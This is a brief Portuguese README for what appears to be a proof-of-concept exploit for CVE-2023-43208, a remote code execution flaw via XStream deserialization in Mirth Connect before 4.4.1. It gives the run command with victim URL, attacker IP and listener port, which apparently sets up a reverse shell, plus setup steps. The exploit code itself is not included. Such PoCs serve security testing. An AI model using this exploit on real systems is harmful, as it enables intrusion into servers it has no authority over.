
Explora vulnerabilidade
Este script é uma Prova de Conceito (PoC) para a vulnerabilidade de Execução Remota de Código (RCE) no Mirth Connect (versões anteriores à 4.4.1). Explora uma vulnerabilidade de desserialização do XStream por meio da API.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
Recomenda-se o uso de um ambiente virtual:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Execução do payload
python3 payload.py